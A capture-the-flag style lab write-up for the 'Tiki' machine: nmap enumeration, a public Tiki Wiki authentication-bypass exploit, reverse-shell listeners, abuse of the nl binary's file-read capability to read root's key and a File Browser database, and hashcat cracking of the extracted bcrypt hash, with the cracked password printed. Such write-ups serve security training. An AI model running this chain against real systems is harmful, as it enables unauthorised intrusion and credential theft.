
VHL — Tiki

TikiWiki CMS Groupware on CentOS. Exploited a known CVE for unauthenticated remote code execution to gain a shell.

February 10, 2025 — Virtual Hacking Labs
#TikiWiki #CMS #RCE #CVE

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 10:54 EST
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 10:54 (0:00:10 remaining)
Nmap scan report for 10.11.1.39
Host is up (0.023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:bb:37:7a:fc:a2:56:3f:25:69:54:27:94:2a:81:a4 (RSA)
|   256 f7:fc:b9:bd:45:b6:e8:40:9d:ee:68:19:d4:48:f5:1d (ECDSA)
|_  256 10:2c:35:1c:5c:8b:62:73:40:0a:30:00:9a:9a:d5:2a (ED25519)
80/tcp   open  http       Apache httpd 2.4.6 ((CentOS) PHP/7.2.34)
|_http-generator: Tiki Wiki CMS Groupware - https://tiki.org
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.2.34
| http-title: Tiki | HomePage
|_Requested resource was http://10.11.1.39/tiki-index.php
| http-robots.txt: 40 disallowed entries (15 shown)
| / /tiki-forums.php /tiki-view_forum.php 
| /tiki-index.php /tiki-read_article.php /tiki-view_blog.php 
| /tiki-list_file_gallery.php /tiki-view_forum_thread.php /*structure=*  /temp/ 
|_/addons/ /admin/ /backup/ /db/ /doc/
3306/tcp open  mysql      MySQL (unauthorized)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/html; charset=utf-8
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"><title>File Browser</title><link rel="icon" type="image/png" sizes="32x32" href="/static/img/icons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/static/img/icons/favicon-16x16.png"><link rel="manifest" id="manifestPlaceholder" crossorigin="use-credentials"><meta name="theme-color" content="#2979ff"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="apple-mobile-web-app-title" content="assets"><link rel="appl
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     Content-Length: 14
|     Found
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request
|_http-title: File Browser
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=2/10%Time=67AA212E%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,11AC,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache,
SF:\x20no-store,\x20must-revalidate\r\nContent-Type:\x20text/html;\x20char
SF:set=utf-8\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Mon,\x20
SF:10\x20Feb\x202025\x2015:54:22\x20GMT\r\n\r\n<!DOCTYPE\x20html><html\x20
SF:lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20http-equiv=\"X-UA
SF:-Compatible\"\x20content=\"IE=edge\"><meta\x20name=\"viewport\"\x20cont
SF:ent=\"width=device-width,initial-scale=1,user-scalable=no\"><title>File
SF:\x20Browser</title><link\x20rel=\"icon\"\x20type=\"image/png\"\x20sizes
SF:=\"32x32\"\x20href=\"/static/img/icons/favicon-32x32\.png\"><link\x20re
SF:l=\"icon\"\x20type=\"image/png\"\x20sizes=\"16x16\"\x20href=\"/static/i
SF:mg/icons/favicon-16x16\.png\"><link\x20rel=\"manifest\"\x20id=\"manifes
SF:tPlaceholder\"\x20crossorigin=\"use-credentials\"><meta\x20name=\"theme
SF:-color\"\x20content=\"#2979ff\"><meta\x20name=\"apple-mobile-web-app-ca
SF:pable\"\x20content=\"yes\"><meta\x20name=\"apple-mobile-web-app-status-
SF:bar-style\"\x20content=\"black\"><meta\x20name=\"apple-mobile-web-app-t
SF:itle\"\x20content=\"assets\"><link\x20rel=\"appl")%r(HTTPOptions,DF,"HT
SF:TP/1\.0\x20404\x20Not\x20Found\r\nCache-Control:\x20no-cache,\x20no-sto
SF:re,\x20must-revalidate\r\nContent-Type:\x20text/plain;\x20charset=utf-8
SF:\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2010\x20Feb\x2
SF:02025\x2015:54:22\x20GMT\r\nContent-Length:\x2014\r\n\r\n404\x20Not\x20
SF:Found\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConte
SF:nt-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\
SF:n400\x20Bad\x20Request")%r(FourOhFourRequest,11AC,"HTTP/1\.0\x20200\x20
SF:OK\r\nCache-Control:\x20no-cache,\x20no-store,\x20must-revalidate\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nX-Xss-Protection:\x201;\x
SF:20mode=block\r\nDate:\x20Mon,\x2010\x20Feb\x202025\x2015:54:22\x20GMT\r
SF:\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><head><meta\x20charset=\"u
SF:tf-8\"><meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge\"><
SF:meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scale
SF:=1,user-scalable=no\"><title>File\x20Browser</title><link\x20rel=\"icon
SF:\"\x20type=\"image/png\"\x20sizes=\"32x32\"\x20href=\"/static/img/icons
SF:/favicon-32x32\.png\"><link\x20rel=\"icon\"\x20type=\"image/png\"\x20si
SF:zes=\"16x16\"\x20href=\"/static/img/icons/favicon-16x16\.png\"><link\x2
SF:0rel=\"manifest\"\x20id=\"manifestPlaceholder\"\x20crossorigin=\"use-cr
SF:edentials\"><meta\x20name=\"theme-color\"\x20content=\"#2979ff\"><meta\
SF:x20name=\"apple-mobile-web-app-capable\"\x20content=\"yes\"><meta\x20na
SF:me=\"apple-mobile-web-app-status-bar-style\"\x20content=\"black\"><meta
SF:\x20name=\"apple-mobile-web-app-title\"\x20content=\"assets\"><link\x20
SF:rel=\"appl");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=22%CT=1%CU=37628%PV=Y%DS=2%DC=I%G=Y%TM=67AA
OS:2194%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(SP=FC%G
OS:CD=1%ISR=10D%TI=Z%II=I%TS=A)SEQ(SP=FD%GCD=1%ISR=10D%TI=Z%II=I%TS=A)SEQ(S
OS:P=FE%GCD=1%ISR=10C%TI=Z%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NN
OS:T11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=
OS:FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%
OS:Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
 
TRACEROUTE
HOP RTT      ADDRESS
1   22.64 ms 10.11.1.39
 
OS and Service detection performed. Please report any incorrec

80

sh
80/tcp   open  http       Apache httpd 2.4.6 ((CentOS) PHP/7.2.34)
|_http-generator: Tiki Wiki CMS Groupware - https://tiki.org
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.2.34
| http-title: Tiki | HomePage
|_Requested resource was http://10.11.1.39/tiki-index.php
| http-robots.txt: 40 disallowed entries (15 shown)
| / /tiki-forums.php /tiki-view_forum.php 
| /tiki-index.php /tiki-read_article.php /tiki-view_blog.php 
| /tiki-list_file_gallery.php /tiki-view_forum_thread.php /*structure=*  /temp/ 
|_/addons/ /admin/ /backup/ /db/ /doc/

8080

sh
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/html; charset=utf-8
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"><title>File Browser</title><link rel="icon" type="image/png" sizes="32x32" href="/static/img/icons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/static/img/icons/favicon-16x16.png"><link rel="manifest" id="manifestPlaceholder" crossorigin="use-credentials"><meta name="theme-color" content="#2979ff"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="apple-mobile-web-app-title" content="assets"><link rel="appl
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     Content-Length: 14
|     Found
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request
|_http-title: File Browser
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 

Tiki Wiki CMS Groupware 21.1 - Authentication Bypass

  • https://www.exploit-db.com/exploits/48927

  • edit the exploit script to remove the /tiki/ path prefix, because on this target the application is served from the web root and there is no /tiki/ directory
sh
python3 48927.py 10.11.1.39 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
  • intercept the login request with Burp, delete the password field, and forward the request

scheduler

sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.39] 60592
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
sh
python -c 'import pty; pty.spawn("/bin/bash")'

priv esc

capabilities (nl)

  • cap_dac_read_search lets the binary bypass file read permission checks, so it can read any file on the system
sh
Files with capabilities (limited to 50):
/usr/bin/nl = cap_dac_read_search+ep
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/local/bin/filebrowser = cap_net_bind_service+ep
sh
bash-4.2$ ls / 
ls /
bin   dev  filebrowser.db  lib	  media  opt   root  sbin  sys	usr
boot  etc  home		   lib64  mnt	 proc  run   srv   tmp	var
 
  • the application on port 8080 (filebrowser) runs with high privileges — as root, per the ps output below
sh
bash-4.2$ ps aux | grep 'root'
ps aux | grep 'root'
root          1  0.0  0.4 125432  4376 ?        Ss   10:53   0:01 /usr/lib/systemd/systemd --switched-root --
root        758  0.0  0.2 168164  2304 ?        Ss   10:53   0:00 /usr/bin/VGAuthService -s
root        760  0.1  0.6 348796  6368 ?        Ssl  10:53   0:30 /usr/bin/vmtoolsd
root        769  0.0  0.7 562664  7692 ?        Ssl  10:53   0:00 /usr/sbin/NetworkManager --no-daemon
root        770  0.0  0.2  26400  2176 ?        Ss   10:53   0:00 /usr/lib/systemd/systemd-logind
root        772  0.0  0.1 126408  1664 ?        Ss   10:53   0:00 /usr/sbin/crond -n
root        789  0.0  0.1 110224  1408 tty1     Ss+  10:53   0:00 /sbin/agetty --noclear tty1 linux
root       1029  0.0  0.2 113016  2688 ?        Ss   10:53   0:00 /usr/sbin/sshd -D
root       1032  0.0  2.8 466148 27200 ?        Ss   10:53   0:02 /usr/sbin/httpd -DFOREGROUND
root       1034  0.0  0.9 574304  8900 ?        Ssl  10:53   0:03 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root       1041  0.0  0.4 214276  4224 ?        Ssl  10:53   0:01 /usr/sbin/rsyslogd -n
root       1043  0.1  1.4 723880 14216 ?        Ssl  10:53   0:28 /usr/local/bin/filebrowser -r /var/www/html -a 0.0.0.0 -p 8080
  • https://gtfobins.github.io/gtfobins/nl/
sh
bash-4.2$ LFILE=/root/key.txt
LFILE=/root/key.txt
bash-4.2$ nl -bn -w1 -s '' $LFILE
nl -bn -w1 -s '' $LFILE
 nlk5ar37smnjoctv4mvt
sh
bash-4.2$ LFILE=/filebrowser.db
LFILE=/filebrowser.db
bash-4.2$ nl -bn -w1 -s '' $LFILE
nl -bn -w1 -s '' $LFILE
 ��

 _������
	
��rM\mP9����U__storm_metadatacodecjsonauther{"recaptcha":null}server{"root":".","baseURL":"","socket":"","tlsKey":"","tlsCert":"","port":"8080","address":"127.0.0.1","log":"stdout","enableThumbnails":false,"resizePreview":false,"enableExec":false,"typeDetectionByHeader":false,"authHook":""}settings{"key":"3jCbLXoHr5Q/ACvoh1xwtk9bSyZXwKYPahCZN0qiqDTCFFzw5PrmiTtO9dYDa2V2wyhVUjkGd+aYjMhsB9oe4g==","signup":false,"createUserDir":false,"userHomeBasePath":"","defaults":{"scope":".","locale":"en","viewMode":"list","singleClick":false,"sorting":{"by":"name","asc":false},"perm":{"admin":false,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"dateFormat":false},"authMethod":"json","branding":{"name":"","disableExternal":false,"files":"","theme":"","color":""},"commands":{"after_copy":[],"after_delete":[],"after_rename":[],"after_save":[],"after_upload":[],"before_copy":[],"before_delete":[],"before_rename":[],"before_save":[],"before_upload":[]},"shell":[],"rules":[]}version2��@<RZ{"id":1,"username":"tiki","password":"$2a$10$VDo0bFCJOPUnUGPby2NhZODKUiqfIRSKlwbb47HVOOQkRf7j/AX9K","scope":"/","locale":"en","lockPassword":false,"viewMode":"list","singleClick":false,"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"sorting":{"by":"name","asc":false},"rules":[],"hideDotfiles":false,"dateFormat":false}__storm_index___storm_index_Usernamtiki__storm_metadata      !IDcountercodecjson 
9Y__storm_metadatacodecjsonversion"2.0.0"P9����U__storm_metadatacodecjsonauther{"recaptcha":null}server{"root":".","baseURL":"","socket":"","tlsKey":"","tlsCert":"","port":"8080","address":"127.0.0.1","log":"stdout","enableThumbnails":false,"resizePreview":false,"enableExec":false,"typeDetectionByHeader":false,"authHook":""}settings{"key":"3jCbLXoHr5Q/ACvoh1xwtk9bSyZXwKYPahCZN0qiqDTCFFzw5PrmiTtO9dYDa2V2wyhVUjkGd+aYjMhsB9oe4g==","signup":false,"createUserDir":false,"userHomeBasePath":"","defaults":{"scope":".","locale":"en","viewMode":"list","singleClick":false,"sorting":{"by":"name","asc":false},"perm":{"admin":false,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"dateFormat":false},"authMethod":"json","branding":{"name":"","disableExternal":false,"files":"","theme":"","color":""},"commands":{"after_copy":[],"after_delete":[],"after_rename":[],"after_save":[],"after_upload":[],"before_copy":[],"before_delete":[],"before_rename":[],"before_save":[],"before_upload":[]},"shell":[],"rules":[]}version204
 >User__storm_dbconfig04
 >User__storm_dbconfig

hashcat

sh
hashcat -m 3200 '$2a$10$VDo0bFCJOPUnUGPby2NhZODKUiqfIRSKlwbb47HVOOQkRf7j/AX9K' /usr/share/wordlists/rockyou.txt
 
$2a$10$VDo0bFCJOPUnUGPby2NhZODKUiqfIRSKlwbb47HVOOQkRf7j/AX9K:mimamamemima

creds

tiki:mimamamemima

  • open any file in File Browser and save it to trigger execution
sh
nc -lvnp 1235
listening on [any] 1235 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.39] 38608
bash: no job control in this shell
[root@localhost /]# whoami
whoami
root
[root@localhost /]# cd /root
cd /root
[root@localhost ~]# ls
ls
anaconda-ks.cfg
key.txt
mysql-community-release-el7-5.noarch.rpm
[root@localhost ~]# cat key.txt
cat key.txt
nlk5ar37smnjoctv4mvt
[root@localhost ~]# date
date
Mon Feb 10 18:24:38 EST 2025